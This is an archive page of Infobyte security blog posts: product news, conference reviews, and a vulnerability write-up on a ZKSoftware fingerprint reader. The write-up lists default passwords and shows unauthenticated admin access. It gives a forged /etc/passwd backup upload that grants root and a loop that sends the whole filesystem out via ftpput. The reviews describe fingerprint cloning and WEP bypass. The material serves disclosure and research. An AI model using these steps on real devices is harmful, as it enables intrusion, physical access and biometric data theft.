Quantcast
Channel: Infobyte Security Research Labs
Viewing all 236 articles
Browse latest View live

Faraday new features: (Notifications, Workspace split, Performance, Api)

$
0
0
Dear Faraday followers, we know have been waiting your monthly update, but you must know how defying is to develop in potentially shippable increments. But here we are, delivering new features each month so you can take the most advantages in your pentests.

That's why we are happy to announce our latest's features.

  • Notifications: Updating objets on faraday now results in a beautiful notification in the QT ui.


  • UI: Workspace split, now you can select the workspace to visualize. We are now using bootstrap.


  • Performance: Enhacing performance when lots of workspaces are available.We now load each workspace whe it's needed instead of loading ahead the full workspace list.
  • API: New operations on the Rest API (this is just for the following UI modifications). Vulnerability update and delete operations.



Perverting Embedded Devices - ZKSoftware Fingerprint Reader (Part I)

$
0
0
As you may have noticed from other blog posts, we like to play around with basically any device we can get our hands on. Incidentally, this year we acquired a bio-metric device that we have had the chance to see during some audits we carried out.
Front view of the ZEM510 fingerprint reader.
Normally when a bug is found in embedded devices, they provide access to a network which could be used to pivot or persist in a network. In this case they can provide physical access to a facility, it's normal to see this kind of fingerprint readers providing access control to highly secure areas, such as data centers or entire buildings.
Back view of the ZEM510 fingerprint reader.
On plain sight we can find:
  • a bootloader screen that says << Linux : security for your life >>
  • LCD screen
  • digital fingerprint reader
  • a keypad
  • power supply port
  • RJ45 network port
  • 2 USB ports
  • at the back, there is a little tamper switch that will detect when the device is detached from the wall, and will trigger the alarm mode. 

Overview

The specific name of the device is ZK-I01A ID GPRS, also known as ZEM510 and costs approximately U$200. It's made by ZKSoftware, which happens to have a reseller here, in Argentina. It's a bio-metric fingerprint reader that's supposed to provide controlled entrance of personnel and security to facilities.

In their official websites you can find a detailed documentation about it. Downloads and user manual also available.

Between the principal characteristics there are a few to highlight:
  • Communication methods:
    • RS232/485
    • USB Host/client
    • TCP/IP
    • Wiegand
  • Reader: EM Marin125 khz, Protocol: Wiegand 26
  • Power supply: 12v, 1,5A and a 4hs additional battery.
  • Programmable output for a bell.

Looking for a way to communicate!

Serial connection via USB

We tried serial communication via USB, which creates a virtual serial port, using miniterm and screen, synchronizing the recommended baud rates and rebooting the device in order to expect some kind of prompt or output, but nothing came out of it :(

Ethernet connection via UTP Cable

After noticing that the network interface by default sets its IP address to 192.168.1.201 and has an access restriction by IP, we found out that setting our local one to 192.168.1.220 would do the trick.
Once we have connection, an nmap port scan shows this results:
  • TCP 80 : the device is running webserver
  • TCP 23 : a classic telnet server (telnetd from busybox)
  • TCP/UDP 4370 : custom protocol
  • UDP 65535 : custom protocol that will respond to requests to broadcast and is used to find the fingerprint readers in the network

Interesting ports, let's dig up a little more.

Telnet? ZEM510?

Port 23 seems to be a telnet service, we check if it's legitimate:
telnetting device
Trying luck with telnet using default users such as:
admin:admin
root:root
admin:1234
Doing a bit of research on the internet we managed to gather several default user:passwords that this vendor normally uses for this kind of devices:
root:colorkey
root:solokey
root:swsbzkgn
admin:admin
888:manage
manage:888
manage:888
asp:test
888:asp
Unfortunately, not a single one of them worked on our device. Additional tools like hydra and medusa were used but also where a no-go.

Web Application Panel

Port 80 was showing a web server so we decided to check it out. A website and a login page for what seems to be a control panel appeared.
Web panel login.
Using a classic, administrator:123456 we got access to the web panel.
Default user credentials working.
Browsing the website and logging the requests led us to determine the web server and the application was handling sessions in a VERY poor way. We could access pages that needed authorization without being authenticated.

The file start.csl includes menu.csl, and this last one gives you access to the rest, so we should try to access it first. We need to destroy our cookie and make sure we are using an empty one to access a restricted area.
Showing session cookie on console.
Showing empty cookie on console on start.csl

And we're in. Let's see the requests in plaintext with ncat so you understand the gravity of the situation.

Accessing /csl/start:
isr@~% ncat zkwebserver 80
GET /csl/start HTTP/1.1
Host: zkwebserver

HTTP/1.0 200 OK
Server: ZK Web Server
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html;
Connection: close

<HTML><HEAD><TITLE></TITLE>
<META http-equiv=Content-Type content='text/html;'>
<META http-equiv=Cache-control content=no-cache>
<META http-equiv=Pragma content=no-cache>
<LINK href='../css/Secutime.css' type=text/css rel=stylesheet>
<META content='MSHTML 6.00.2900.3562' name=GENERATOR></HEAD>
<FRAMESET border=0 frameSpacing=0 rows=37,* frameBorder=NO cols=*>
<FRAME name=header src='/csl/header' noResize scrolling=no>
<FRAMESET border=0 frameSpacing=0 rows=* frameBorder=NO cols=180,*>
<FRAME name=menu src='/csl/menu' noResize scrolling=auto>
<FRAME name=content src='/csl/desktop'></FRAMESET>
</FRAMESET>
</HTML>
You can see that the web server replied with 200 OK and tried to load in framesets /csl/menu, /csl/desktop and /csl/header without asking for an auth. So far we can't state for sure that calling /csl/menu directly will have the same effect.

Accessing /csl/menu (stripped content for clarity):
isr@~% ncat zkwebserver 80 
GET /csl/menu HTTP/1.1
Host: zkwebserver

HTTP/1.0 200 OK
Server: ZK Web Server
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html;
Connection: close

Terminal
javascript:oncwx(); -> Login Off
/csl/desktop -> Dev Status

User Report
/csl/report -> Report
/csl/query -> Query
/form/RealTime -> Monitor

User Administration
/csl/dpm -> Department
/csl/user -> User
/csl/user?action=add -> Add User


Setting
/form/Device?act=5 -> TCP/IP
/form/Device?act=17 -> WIFI Setting
/form/Device?act=3 -> Date/Time
/form/Device?act=7 -> Change Password

Terminal
/form/Device?act=11 -> Backup
/form/Device?act=14 -> Restore
/form/Device?act=12 -> Update
/csl/download -> Download

/form/Device -> Reboot
Response shows menu content loaded completely, and to make it even better you can see how bad they are handling sessions: the 'Login off' option is nothing more than a call to a JavaScript function that takes you to the login page.

If the login page had a destroy session or something alike it would be considered a CSRF, which in this case, supposing that sessions were handled "properly", meant the only "security" administrators had, but no, not even that.

We can conclude either an anonymous user or an administrator have the same privileges on the website, making session handling utterly useless. The only difference would be that the anon user has to access menu directly and the admin can make use of their fantastic "Web 3.0" login.

Web vulnerabilities

Now that we completely control the web interface, we started looking for vulnerabilities that could lead to access to the linux that's running below.
For this post we're leaving web vulnerabilities aside and instead we'll discuss just one major one, you'll see why soon.
Web backup section.
In the backup section we got two options, backup either System data or User Data. Any of those options will download a .dat file

Downloading backup system data example.
Showing downloaded files:
isr@zk% file *
data.dat: gzip compressed data, max compression, from Unix
device.dat: gzip compressed data, max compression, from Unix
They are both gzipped, let's extract them.

user.dat [Backup user data] :
isr@zk% tar zxf data.dat && ls -R
.:
data.dat device.dat mnt/

./mnt:
mtdblock/

./mnt/mtdblock:
custattstate.dat custvoice.dat data/ dpmidx.dat extlog.dat extuser.dat oplog.dat sms.dat udata.dat user.dat workcode.dat

./mnt/mtdblock/data:
extlog.dat template.dat transaction.dat
Peeking around we found that most of the files were illegible or empty, and decided to continue with the next gzipped file before going further.

We deleted the entire extracted folder in order to avoid contents to be overwritten in the next extraction.

device.dat [Backup system data] :
isr@zk% tar zxf device.dat && ls -R
.:
data.dat device.dat mnt/

./mnt:
mtdblock/

./mnt/mtdblock:
options.cfg

A config file is always interesting to see! The file options.cfg contains configuration variables, below some of them categorized for a better understanding:

Network
IPAddress=192.168.1.201
GATEIPAddress=192.168.1.1
NetMask=255.255.255.0

Communication
UDPPort=4370
TCPPort=4368
WEBPort=80
RS232BaudRate=115200
RS232On=1

Device info
Platform=
OEMVendor=ZKSoftware Inc.
AlgVer=ZKFinger
ProductTime=
SerialNumber=
DeviceName=

Device configuration
TFTKeyLayout=0
LcdMode=0
KeyPadBeep=1
VoiceOn=1
VOLUME=67
AlarmOpLog=99
Language=83
AdmRetry=3

Web Administrator password
LoginPWD=123456

Paths
WAVFILEPATH=/mnt/ramdisk/wav/
BMPFILEPATH=/mnt/mtdblock/image/
FONTFILEPATH=/mnt/mtdblock/
PICFILEPATH=/mnt/mtdblock/
WebRoot=/mnt/mtdblock/
PHOTOFILEPATH=/mnt/mtdblock/photo/
CAPTUREPHOTOPATH=/mnt/mtdblock/

It's clear that options.cfg includes lots of sensible configuration information (not only from the web interface, but from the entire device) that you can even pushed back modified with the 'restore backup' option UNAUTHENTICATED.

SOAP API

If you want to head this way, you will also find that the web server has a SOAP API (without authentication, of course) allowing you to retrieve the entire list users (passwords included), the last users that opened the door, and pretty much everything.

Got root? Arbitrary File Injection

At this stage it was clear for us that we should try to re-upload the backup folder with additional files to test the restrictions of the uploader and see what happens.

As we already know, the server that's running behind is a Linux on a MIPS, meaning user's passwords database is /etc/passwd file and probably /etc/shadow. So we generate a passwd file with user root and a known password:

isr@zk% echo "root:knownpassword:0:0:root:/root:/bin/sh"> passwd
Note that we're using the plain representation as an example, md5crypt should be used.

Setting up the passwd file in context:
isr@zk% mkdir etc/ && mv passwd etc/
Compressing again with gzip and uploading our 'backup' via web interface using the same name the file had when it was downloaded (data.dat for example).

Restore data section.
Upload success.
Let's see if it worked, shall we?
ZEM510 shell prompt
Awesome! As you can see the passwd file was successfully overwritten with ours. And now we have root access.

Privacy issues

All these vulnerabilities also raise the question of privacy: are the personal information of the users safe?
From the user's manual the manufacturer claims the following:
  1. All of our fingerprint recognition devices for civil use only collect the characteristic points of fingerprints instead of the fingerprint images, and therefore no privacy issues are involved.
ZKSoftware Statement on collection of fingerprints

Ok, that would be great if it were completely true.

Login ids, as we've seen in pentests before, are always associated with the user's real name and their fingerprint. The vendor states that the fingerprint is stored as a representation of itself, and they are not lying, but also missing an important point on the process.

When a fingerprint is scanned and pushed back to the database, interchangeably if it comes from a new user or an existing one, a temporary fingerprint image is always stored at /mnt/ramdisk/finger.bmp so the device can calculate its characteristics until the next fingerprint replaces it.

An example of a typical image that can be found on the device.
Thumb fingerprint.
Compromising the device and installing a backdoor to retrieve every uploaded fingerprint to later associate them to the corresponded users, will end up on a nice recompilation of information from a facility, don't you think?

Emulation of the device

In order to find more vulnerabilities, we will set up the embedded device, but since there is no firmware available, we are going to extract all the information from a live device.

Dump it all!

To understand more about the structure of the OS we downloaded it entirely.

Busybox command list
The commands were scarce, but making a simple script like the one below, using ftpput, we were able to pull the entire system to our computers.

dump.sh: for i in $(find `pwd` -name "*"); do ftpput ftp_server $i $i done
Having everything needed to replicate the environment we just miss a MIPS Virtual Machine to properly emulate the firmware, and this can be achieved quite easily by using QEMU.

With the VM working and with a chroot in place, we were able to run a binary named « main», located in /mnt/mtdblock/main, which is in fact the main binary for the web application and... almost everything. It's also one of the few binaries that run in the server besides telnetd.

Troubleshooting

When launching main, we found out it was messing with the TTY (that is used as a framebuffer device, for the TFT screen), making it impossible to interact. Same thing happened with network (it reconfigures when starting), but by adding an empty « ifconfig» command in/usr/local/bin, we were able to circumvent this problem.

Additional findings

We also found that the web service and their custom « main » service were vulnerable of buffer overflows and arbitrary file disclosure. These vulnerabilities will be published on Part II, next week

Thanks to @achillean who kindly provided us access to SHODAN maps, we leave you this lovely postcard:



Authors from @infobytesec Team:

Nuevo workshop en ISSA Argentina - Pentesting Colaborativo

$
0
0
¿Estás en Buenos Aires el día 15 de Agosto?

Te invitamos a participar de un workshop sobre las distintas fases y tareas a la hora de encarar un pentest en equipo.

  • ¿Cómo distribuir la información?
  • ¿Cómo entender las tareas concurrentes que se están ejecutando?
  • ¿Cómo sacarle el juego a todos los reportes generados?
Veremos distintas tools existentes en el mercado y mostraremos un poco como Faraday resuelve los problemas más comunes.

Mas info en acá.

EKOPARTY 2013 - Lockpicking & Conference review

$
0
0

INTRODUCCION 

Participar en una Eko es todo un desafío, es pasarse horas frente a un monitor, reunidos o a distancia, haciendo research sobre distintas áreas para llevar adelante el stand y por sobre todas las cosas llegar con el tiempo justo y con todo andando para el evento. En las siguientes páginas contamos un poco esta experiencia de intentar innovar y actualizar algo que se viene haciendo hace años, correr contra el tiempo y sin embargo hacer que “la cosa funcione”. 

EL STAND

Este año uno de los puntos quizás más importantes fue apostar a un espacio dedicado mas grande y sumar actividades, a raíz de la gran convocatoria que hubo en la Eko anterior cuando como taller, explicamos cómo hacer herramientas propias para Lockpicking. El stand y todas las actividades involucradas, estuvieron organizadas por Infobyte y el espacio se dividió en distintas áreas, con una sección de cerraduras (trabex, candados, tambor, etc), una nueva apuesta la cual llamamos “La Caja” que consistió en un desafío de seguridad física e informática y por último, destinamos un área donde constantemente y a modo de workshop, se explicó cómo copiar y levantar huellas para generar “dedos” falsos y así obtener acceso en cerraduras con lectores biométricos, en este caso un ZKSoftware. 

Del mismo modo y al igual que en anteriores ediciones, todo aquel que quería participar en las actividades del stand convencionales de lockpicking, podía hacerlo sin inconvenientes y en todo momento, ya que había a disposición todo tipo de herramientas hechas caseramente como las típicas ganzúas y tensores, y también un kit hecho especialmente para el workshop de biometría, con todo lo necesario para iniciarse en estas técnicas. 

DESAFIO "LA CAJA"

Nace como un nuevo desafío en esta última edición y sobretodo como un intento de implementar distintos tipos de dispositivos de seguridad física, desde cerraduras, sensores de contacto, PIR y un infrarrojo, hasta una barrera de lasers, un lector biométrico y una cámara IP conectada a un router wifi, en un juego que más allá de entretener tenía una alta dificultad e involucraba distintos conocimientos y habilidades, desde informática, pasando por electrónica y por supuesto, lockpicking. El objetivo era vulnerar todo el sistema de seguridad y poder conectar un teclado USB a un conector que se encontraba en el interior de la misma y tipear una cadena de texto. El ataque podía ser centralmente o a los sensores de forma individual, todo evitando activar una alarma que se disparaba al activarse alguno de los mismos, dejando al equipo participante fuera de juego hasta su próximo turno. Se otorgó un flag de puntaje máximo para aquellos participantes que lograran vulnerar la caja y concursaran en el CTF (Capture the Flag), además de un premio entregado al finalizar la edicion de la Ekoparty. 

CONSTRUCCION Y FUNCIONAMIENTO 


Primeras imágenes de la caja, su armado en fibrofacil, pintado posterior y colocación de acrílicos 

La caja se construyó utilizando fibrofacil en todas sus partes, luego se colocaron acrílicos en el interior de la misma para separar la electrónica y no permitir el acceso a la misma desde adentro, pero que al mismo tiempo pudiera observarse su interior y aportar datos para descubrir sensores y su funcionamiento. 

Del mismo modo se colocó un acrílico en la parte superior de la caja con un orificio de 15 cm de diámetro el cual tenía la función de “tentar” a los participantes de tener acceso al USB en su interior de una manera más simple que vulnerar todo el resto de los sensores y seguridad de las puertas, activando el PIR, infrarrojo o barrera de lasers. 

Esta “tapa” con su orificio, también tenía ubicado en sus cuatro extremos sensores de contacto, de modo tal que si alguien podía sacar los candados que aseguraban el acrílico a la caja, al levantarlo y no advertir la presencia de los mismos, iba a disparar la alarma. 

Detalle del acrílico en el interior, sensor PIR, fuentes de alimentación y Arduino 

Todos estos dispositivos se controlaron mediante la utilización de Arduino y conectados mediante opto acopladores a los distintos sensores, también se utilizó un relé adosado al Arduino. 

La caja estuvo alimentada principalmente por dos fuentes switching comunes de PC, la cámara IP con su fuente correspondiente al igual que el router y parte del lector biométrico ya que la cerradura magnética se alimentaba con las fuentes. 


 Detalle de ambos accesos por puerta a la caja, el de la cerradura magnética y lector biométrico + cámara IP (izq) y la puerta con cerradura tipo trabex + candado y sensor de apertura de la misma (der). 


  Detalle de IR para la barrera laser (izq) y PIR (der) 

 Detalle de barrera laser en pleno juego

La barrera laser que estaba en el interior de la caja, eran básicamente 4 diodos laser que emitían un haz desde el interior del lado que estaba protegido por un acrílico y atravesaba todo el largo de la caja rebotando en unos espejos colocados en su otro extremo, para volver a donde se originaron y ser recibidos por un sensor IR que chequeaba constantemente que el haz no se interrumpiese en ningún momento, si esto ocurría al igual que con el resto de los sensores, activaba la alarma. 


Detalle de uno de los accesos de la caja que solo podía ser abierto si se lograba duplicar un dedo mediante la técnica explicada en el workshop y de esta forma vulnerarlo

La caja se armó de forma tal de que los participantes se vean obligados a ingresar por la puerta que tenía el lector biométrico (es por eso que se dio un workshop explicando cómo duplicar huellas y como poder vulnerarlo), también se podía hacer por la puerta del otro extremo, pero dado que los participantes solo tenían 10 minutos por pasada, llevaba demasiado tiempo abrir el candado y la trabex, motivo por el cual no era conveniente. 

Otro de los posibles caminos era quitando el acrílico de la parte superior, sin que se activen los sensores de presión, vulnerar el PIR e infrarrojo y por último los lasers para poder conectar el teclado. 


Detalle de una de las computadoras que controlaban la lógica de la caja 

Como decíamos más arriba toda la lógica se controló utilizando como interfaz Arduino y después una aplicación hecha en Java corriendo sobre un Linux en una Asus 1000H. 

Se establecieron distintos valores de umbral de sensibilidad de cada sensor de la caja y se testeo que todo funcionara correctamente, se calibraron los lasers (que el haz rebote correctamente en los espejos y se reciba bien en los IR) y se hicieron pruebas de juego para establecer estos valores y se fueron ajustando a lo largo de la Eko a medida que los participantes ponían a prueba el sistema. 

Cabe destacar que había una ayuda para aquellos que se animaran a intentar romper la clave WEP del router Linksys WRT54G, ya que teniendo acceso a la red wifi (era accesible para todos los que estuvieran en las cercanías incluso sin jugar) se podía ver mediante la cámara IP la disposición de todos los sensores, haz de laser y espejos y elaborar una mejor estrategia a la hora de vulnerar la caja. La única dificultad para esta ayuda era que el router tenía registrada la dirección MAC de una sola computadora que podía acceder y para quienes quisieran entrar, luego de romper WEP tenían que estar a la escucha analizando trafico esperando a que esta computadora accediera al router (ocurría 1 vez por hora) para obtener su MAC.

WORKSHOP 

Durante los 3 días que duro la Ekoparty, estuvo a disposición de todos aquellos interesados en el tema y de participar más activamente en el desafío de la caja, un workshop de duplicación de huellas para vulnerar lectores biométricos. 




En el mismo se explicaba cómo hacer las duplicaciones utilizando Cianocrilato y Siliconas para odontología para hacer el levantamiento de las huellas y su posterior armado de un “dedo falso” de silicona con la huella levantada. 

En el workshop se entregaban los materiales necesarios para llevarlo a cabo y se daba una breve charla sobre cómo realizar el procedimiento. 

Cabe destacar que la técnica explicada es viable actualmente en la mayoría de los sistemas de acceso y fichaje en empleos por ejemplo, mostrando que no solo es posible vulnerar estos sistemas de una manera eficaz y rápida, sino con materiales que es posible conseguirlos por poco dinero y sin complicaciones en cuanto a su disponibilidad en el mercado. 

CONCLUSIONES 

Una vez más nos llevamos una gran cantidad de momentos gratos y divertidos de la Eko, pero por sobre todo la satisfacción de haber concretado una apuesta que hicimos tiempo atrás al cerrar la edición anterior de mejorar y poder ofrecer “algo más” a lo que tenemos acostumbrados a todos en el stand de Lockpicking. 

También esta apuesta es un gran desafío para lo que viene, porque implica volver a apostar a superarnos para la próxima y que no solo sea mejor, sino poder presentar algo novedoso en el tema. 

Creemos que hay mucha gente interesada no solo en Lockpicking propiamente dicho sino en todo lo relacionado a Seguridad Física y el alcance de lo que implica, hoy día es importante tener control sobre el perímetro por ejemplo de servidores y lugares donde se resguarda información de una manera confiable y segura. 

Es por eso que más allá de nuestro desafío que plantea de manera lúdica los distintos mecanismos, sensores, algo de electrónica y programación para mostrar en pequeña escala el funcionamiento de estos dispositivos y sistemas, y la interacción con individuos que intentan vulnerarlo, se tome conciencia de que muchas veces la seguridad de la información se ve comprometida por el entorno físico que se descuida, y simplemente con conocer cómo funcionan todos estos dispositivos y estos sistemas, sus vulnerabilidades y formas correctas de implementarlas, es posible mejorar en creces la seguridad y protección de la información.



EKOPARTY 2013 - STAND LOCKPICKING 
EQUIPO DE TRABAJO 

RESEARCH, DESARROLLO Y COORDINACION GENERAL 
 (Workshop Huellas – La Caja – Stand) 
Juan Urbano Stordeur 
Juani Bousquet 

ASISTENCIA ARMADO, PROGRAMACION, OPERACIÓN “La Caja” 
Matías Nahuel Heredia 
Carlos Pantelides 
Alejandro Rusell 

ASISTENCIA 
Juan Pablo Vercesi 



El stand de lockpicking, el workshop sobre duplicación de huellas biométricas y el desafío de “La Caja” se desarrollaron en Infobyte LLC. y se realizaron exclusivamente para Ekoparty Security Conference edición 2013.

New Workshop in ISSA Argentina- Collaborative Pentesting

$
0
0
August 15th, are you in Buenos Aires?

We would like to invite you to take part in our workshop focusing on the different phases and tasks when you start a team pentest.


  • How to distribute information?
  • How to understand the different tasks when they are all running simultaneously?
  • How to use the different resources available to boost productivity? 
We´ll take a look at all the different tools on the market and we will work a bit with Faraday to see how it can help with typical problems.

Mas info en acá.

EKO Party Review 2012

$
0
0
More than a month after the grand finale of the Ekoparty Security Conference 2012and with a little time to better understand all the big things that came out of the 8th edition of the EKO party. We did this review for everyone that came and for those that weren´t able to make it unfortunately.

Like we´ve grown accustomed to, the conference was split into two parts with two days of training and three days of talks (Sep 17th to the 21). We were fortunate enough to return to the Centro Cultural Konex, where we had over 1,500 attendees and had to use both the full auditorium and all additional seating.


The staff like always surprised us with a bit of a show with a ¨special theme¨... They didn´t disappoint with a spaceship falling to the stage with parachutes. Of course, like any spaceship this one had an astronaut (and a chimp!) and somehow a laser shooting robot got involved as well.




             

           

           

Like every year, people were really looking forward to the event. We had the traditional CTF (capture the flag), Lockpicking and lots of stands from sponsoring with fun games (a couple with bars to loosen up the crowd) and later very cool speakers. We had many speakers from Latin America who are well know abroad and additionally we were able to have internationally recognized speakers come from outside the region as well..

#Day 1

The first day we thought we were going to have some complications because of the rain, but everyone to their credit came with a big smile on their face. As in past editions, this part was mostly workspots and had only one talk about the EKO party kick-off.

This talk was given by Cesar Cerrudo and was called Cyberwar para todos” (Cyberwar for all). The talk like always made us think and reflect about current events in the industry. It made us question how much we know about cyber weapons. Should we take them seriously? What are the problems posed to Argentina and around the world.


                                    

After finishing up the talks, everyone broke into workshops which normally lasted about two hours. Some worth highlighting were Fernet Overflowfrom Enrique Lurleo and David Arch (Argentina being one of the spiritual and commercial homes of fernet), Forense en dispositivos Androidgiven by Julian Zarate, and the VERY popular lockpicking workshop by Juan Urbano Stordeur. Check out the pictures!

             

                       

Luckily the workshops were quite busy and we were able to show off for the first time in the EKO Party how to break locks with bike spokes. For me it´s pretty interesting because who doesn´t have one of these in their house?

                  

         

And of course we couldn´t forget the good old-fashioned wardriviing, around scenic Buenos Aires making a router map. Thanks to having done this in past years we were able to see that more people are using passwords for their routers and are using better algorithms to protect them. We finished off the wardriving in a bar named Roots were we were able to eat some much needed pizza and sip on a few beers.

   

#Day2

The second day began with a lot of enthusiasm and excitement. We started off with the foamous CTF (capture the flag) but everyone was already pretty psyched with pre- talks with A LOT of action.

           

The First Talk was Inception of the sap plataform’s brain: Attacks to sap solution manager” done by Juan Perez Etchegoyen and was about how to hack into the SAP Solution Manager through various attack vectors.



                      



After we continued with a talk from Matias Eissler and Andres Blanco titled One firmware to monitor ‘em all”. In this talk they showed how to manipulate the different firmwares especially those used in wireless cards, smartphones and tables and how to create a Fake AP.




                     


Then we had a talk titled Sql Injection from zero to pwnby Matias Katz and Maximiliano Soler who showed how to take control of a server from scratch through the tool HTEXPLOIT coded in python, which they are thinking about adding more funcions like map, dirbuster, metasploit among others.


     
  
Right before lunch we had a talk fromStephan Chanete  “The future of automated malwere generation, the R&D director of Ioactive who showed ¨exploits as a service¨, which referred to automated malware and how to evade antivirus software


                     

After a quick bite to eat, we got to “Fear and Loathing in Java¨ given by Esteban Guillardo which showed a path of vulnerabilities of Java from its inception up to the present day.and how to exploit them. This talk had a bit of an unexpected spicy sauce when surprisingly a mariachi band (in the middle of the presentation) sang a love ballad in his honor.



             



          


Later we continued with Rahul SasiFuzzing DTMF Input Processing Algorithms”, where he talked about how to code tones of DTMF (Dual-Tone Multifrecuency signaling) and how to alternate IVM terminals, showing how to saturate one of these with a massive influx of 1´s.

             



Lastly, as the day was finishing up came a a talk from Alfredo Ortega and Sebastian MuñizSatellite basebands mods: taking controll of the InmarSat GMR-2 phone terminal”, who demonstrated how to modify the firmware through only a cable usb and the impact this can have. With the use of sniffing and injection pacets between the telephone and the satellite.


                               

To conclude the day we had relaxed with a few drinks in the Konex Cultural Center chatting a bit and meeting new people. While all of this was happening we had another a unexpected treat when an engineer from ITBA (Dan Etenberg) made his very own tesla coil and plane turbine. He had a lot of fun showing us how to light up the neon sign of the EKO and shooting fire from the turbine.


                           

#Day 3

As the last day approached we had mixed feelings. On the one hand, we were anxious because there were still really good talks and always they try to save the best for last. At the same time we were a little down because, it´s something we look forward to the entire year and it was already winding down.

The first talk was presented by ¨The Gruqq¨ dealing with the topic of OPSEC:”Because jail is for wuftpd”. He showed the accusations of hackers through central intelligence systems. He showed how best to cover your trails and sensitive information through software and various techniques.

       

Right after, continued the Argentine
Agustin Gianni, who had already been a speaker a number of times in the EKO party with Trace Surfing”. He spoke about automated techniques to improve the required times while investigating inverse engineering for software.


                        

Following Agustin, we had the internationally recognized,Lorenzo Martinez (one of the writers of securitybydefault), presented Welcome to your Secure /Home, $User”. This talk was very interesting demonstating how to apply biometrics, utilize cameras, facial recognition with a date base, connected alarms TCP/IP, third party knowledge, etc.


                   

After lunch, there was 4140 Ways your alarm system can failby Babak Javadiwhere Babak and his coworkers showed us that security alarms in the office or home are not really so secure. They demonstrated how to obtain user passwords with brute force. It reminds us that it´s good to keep in mind physical security and infrastructrure.


                
               

The second last talk was from Ravi Borgaonkartitled “Dirty use of USSD codes in cellular network” and it dealt with an introduction of contents (USSD) to show us later how to exploit the Android operating system. He concentrated especially on the Samsung Galaxy (SI SII SIII) Line where we were able to see how to exploit the device with malicious code. This way you could restart the cell and block the SIM by entering invalid PUKs.

               
               


Finally we got to the much anticipated talk from Juliano Rizzo and Thai Doung where last year they had really impressed us with BEAST. This year they showed a very serious error in the TLS protocol and how to exploit it to obtain cookies. There were a couple technical problems and the people were a little bummed they were not able to see the demo live. But then appear Ice-Bolt and his Chimpanzee Astronaut and that left everyone happy and smiling.


                   

Here you can find the slides acá (here) that show off a little more of the EKO party and explain a little better the talkes.



While of course the emotions are bitter sweet because really it is a labor of love. We finished off with a bang with awards for the different stands, the lockpicking workshop and juicy awards of the CTF (for the first three finishers). The prizes were training and cash making us the first conference in Latin America to give such a large cash prize.


                        

Really we have to thank the EKO planning staff that really did an incredible job and had been working hard for months to make sure it was a success. To everyone involved merchandising, security, catering, you guys all do a great job making it more than a security conference but a security fiesta!

See you next year!


                         



Thanks for the photos Day 1 http://bit.ly/NL4qH0 - Day 2http://bit.ly/NL4tTf - Day 3 http://bit.ly/NL4uGM

Juan Urbano Stordeur.



EKOPARTY 2013 - Lockpicking & Conference review

$
0
0
INTRODUCTION 

To work on an EKO to say the least is a challenge. It means sitting in front of a monitor, A LOT of meetings, doing research in different areas to be able to make the stand work and above all have enough time to to make things running smoothly for the event. In the next couple of pages were going to talk a bit about our experiences trying to innovate and upgrade something that we´ve been doing for a quite a few years now. We are always running against time, but our motto in these situations is ¨get it done¨. 

THE STAND

This year, maybe one of the most important things for us was to get a place with more space and be able to add activities, due to the big turnout that the last couple EKO parties have had. Especially, when we did different workshops, for example Lockpicking. The lockpicking stand was organized by Infobyte and the space was divided in distinct areas; a hardlocks section (skeleton keys, padlocks and yale locks), a new game called ¨the box¨ that consisted of a physical security challenge as well as in the cyber realm. Lastly, we did an area where, (workshop style) we explained how to copy and lift prints to generate ¨fake fingers¨ and using this we were able to obtain access to the locks with biometric readers, in this case utilizing ZKSoftware.

Keeping with the tradition of past years, everyone that wanted to participate in the stand´s activities could try their hand at the lockpicking whenever they wanted. The participants already had a number of different tools available (many made from scratch) like picks and torsion wrenches and there was a kit made especially for the biometrics workshop with everything necessary to get started.


THE BOX CHALLENGE

Born as a new challenge in last year´s EKO and above all an attempt to implement different types of security. Whether it be machines, from locks, to contact sensors, PIR, an infored, a maze of lasers, a biometrics reader and an IP camera connected to a wifi router. All this was connected to a game that apart from  being highly entertaining was actually quite tricky and involved different types of expertise and abilities ranging from informatics to electronics and finally of course lockpicking. The goal was to find vulnerabilities throughout the security system and be able to connect a USB keyboard that was found inside the box and finally type a chain text. The attack could be done centrally or deactivating individual sensors, trying to avoid sounding an alarm (if they do the participating team is out until the next round). A flag is granted for the highest score for those who could beat the ¨box¨ and are participating in CTF (Capture the Flag), the winners at the end of the EKO were given an award and prize.

Construction and Function 


The box during it´s inception and then after painted and with acrylics

The box was made using fibreboard, after acrylics were placed in the interior to separate the electricity and make sure it didn´t connect to inside the box. At the same time you could observe its interior and use information to discover sensors and its functionality.

On top of the box were placed acrylics with a hole of 15 centermeters in diameter which was there to be a tease for the participants. The idea was that they would think that they had an east way to access the USB but really the opposite (this actually would trip sensors and the security doors, the infrared and the lazer maze).

This ¨top¨with the hole also had located in corner four little locks. If you happened to move the locks to take off the acrylic cover, the alarm would go off. 


The interior acrylic covering, PIR sensors, nutricion sources and Arduino

All these devices were controlled through the use of Arduino and connected through opto-isolators and distinct sensors. Additionally, a switch was connected to Arduino.

The box was powered by primarily 2 common switching sources from a PC, the IP camera was also a source the same as the router and part of the biometric reader as well as the magic lock that was fed with the power sources.


Both access points of the ¨Box¨. The access point for the magnetic lock, the biometrics reader and IP Camera (left). The door with the skeleton key and hardlock and sensors (right)

  Detalle de IR para la barrera laser (izq) y PIR (der) 
THE IR for the laser maze (left), the PIR (right)

 The laser maze running

The laser maze that was inside the box, was basically 4 diode lasers that emitted a beam from the inside (from the side that was covered with the acrylic), throughout the length of the box bouncing off mirrors places on the other side, to return to the side where they came from and to be received by an IR sensor that checked constantly that the beam wasn´t interrupted, and if this happened to the rest of the centers it set off the alarm.


The access point for the box that only could be opened if you managed to duplicate a fake finger

The box was made in a way that it seemed like the participants had to go in through the door that had the biometric reader (because of this, we gave a workshop explaining how to duplicate fingerprints how to be able to infiltrate them), also you could do it through the door on the other side but given that the participants only had 10 minutes to get through, it took too much time to open the padlocks and the skeleton locks.

Another of the possible ways to go through was remoing the acrylic of the part on top, but so that they didn´t activate the sensors. Then infiltrate the PIR and infrared and lastly the lasers to be able to connect the keyboard (not as easy as it sounds).

One of the computers that controlled the box

Like we said above, the box was controlled by the inferface Arduino and after a application made in Jave running through a Linux in an Asus 1000H.

Different sensistivity thresholds were established for each sensor in the box and the lasers were calibrated (The beam bounced correctly off the mirros and was reflected well by the IR). Before, of course we had tested to establish the values and we kept on adjusting them through out the EKO.

It´s worth saying that we had help for those that wanted to break the password for the WEP of the Linksys WRT54G router, as they already had access to the wifi network (it was accessible for everyone close even those not playing). Also, they could see the IP camera, the availibility of all the sensors, the laser beam and mirrors and elaborate a better strategy 
